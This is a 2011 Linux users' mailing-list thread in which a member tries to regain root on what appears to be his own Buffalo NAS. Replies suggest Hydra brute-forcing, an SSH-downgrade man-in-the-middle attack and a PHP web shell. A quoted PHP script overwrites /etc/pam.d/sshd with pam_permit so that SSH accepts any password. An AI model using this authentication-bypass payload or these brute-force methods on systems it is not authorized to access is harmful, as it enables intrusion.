Is it possible to extract the root password from the file system?

Dan Dubovik dandubo at gmail.com
Mon Jul 18 22:06:02 MST 2011


Can you SSH as the hammerhead user?

When you FTP as the hammerhead user, can you move the script.php file to the
htdocs directory?  It has 777 permissions, so should be able to open it /
drop a file there.

If you can get a PHP file uploaded and able to execute properly, perhaps a
PHP based shell could help?

-- Dan.

On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold <lisakachold at obnosis.com>wrote:

> I believe the script.php has to be moved the webroot directory and given
> permissions there I believe, but well if you can't get a login via ssh... --
> how to do it?
>
>
> On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips <mark at phillipsmarketing.biz
> > wrote:
>
>> On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>>
>>> There are alot of password files and dictionary lists on various sites.
>>> Backtrack5 contains a good number.
>>>
>>> But I imagine that it's either not allowing root via ssh or you have the
>>> wrong username.
>>>
>>
>> It turns out the box is smarter than a fifth grader.....after a few hydra
>> attacks, it started rejecting all the hydra attempts to ssh in via root.
>> Once I stopped hydra (after running all night), it took a couple of hours
>> before it would respond to ssh attempts from root. It now will ask for the
>> root password, but I still have no idea what it is.
>>
>>>
>>> Or it's a truely random string.
>>>
>> It could be....the password for the zip file to unzip the file system is
>>
>>  YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
>>
>> . Someone retrieved it using a disassembler on the file system.
>>
>> I did some more reading, and one person was able to use php to allow ssh
>> login. The box allows one to create a web space, and it comes with php
>> installed. One can edit the php.ini file, and I can upload via ftp a php
>> script. The script they suggested is:
>> <?php
>> $file = '../../../../etc/pam.d/sshd';
>> $fh=fopen($file, 'w') or die("can't open file");
>> $stringData = "account  required   pam_unix.so\n";
>> fwrite($fh, $stringData);
>> $stringData = "session  required   pam_unix.so\n";
>> fwrite($fh, $stringData);
>> $stringData = "auth required pam_permit.so\n";
>> fwrite($fh, $stringData);
>> fclose($fh);
>> ?>
>>
>> I uploaded the script, but I get a 404 File not Found when I access the
>> page. I thought it might be a file permission error since the file is only
>> rw. I tried chmod 777 at the ftp prompt, and got the error message File not
>> Found, but ls shows it is there.
>>
>> ftp> ls
>> 200 PORT command successful
>> 150 Opening ASCII mode data connection for file list
>> drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
>> drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
>> drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
>> -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
>> 226 Transfer complete
>> ftp> chmod 777 script.php
>> 550 CHMOD 777 script.php: No such file or directory
>> ftp>
>>
>> Is there anything I can change in the php.ini file to make this script
>> execute? Or, am I missing something else?
>>
>> BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
>>
>> Thanks,
>>
>> Mark
>>
>>>
>>> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <
>>> mark at phillipsmarketing.biz> wrote:
>>>
>>>> Since this is a drive buffalo, I might try ettercap ssh downgrade
>>>>> attack:
>>>>>
>>>>> http://openmaniak.com/ettercap_filter.php
>>>>> ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>>>>>
>>>>> Not sure how a man in the middle attack will work, since I don't know
>>>> the password to begin with...
>>>>
>>>> Or Hydra:
>>>>>
>>>>> Hydra Instructions:
>>>>>
>>>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>>>>>
>>>>>>
>>>>>>> Hydra is promising. I tried it with the common passwords list from
>>>> openwall. No luck. Do you have any better password lists?
>>>>
>>>> Thanks,
>>>>
>>>> Mark
>>>>
>>>> ---------------------------------------------------
>>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>>> To subscribe, unsubscribe, or to change your mail settings:
>>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>>
>>>
>>>
>>>
>>> --
>>> (602) 791-8002  Android
>>> (623) 239-3392 Skype
>>> (623) 688-3392 Google Voice
>>> **
>>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------
>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>> To subscribe, unsubscribe, or to change your mail settings:
>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
>
> --
> (602) 791-8002  Android
> (623) 239-3392 Skype
> (623) 688-3392 Google Voice
> **
> HomeSmartInternational.com <http://www.homesmartinternational.com>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110718/0a1cc077/attachment.html>


More information about the PLUG-discuss mailing list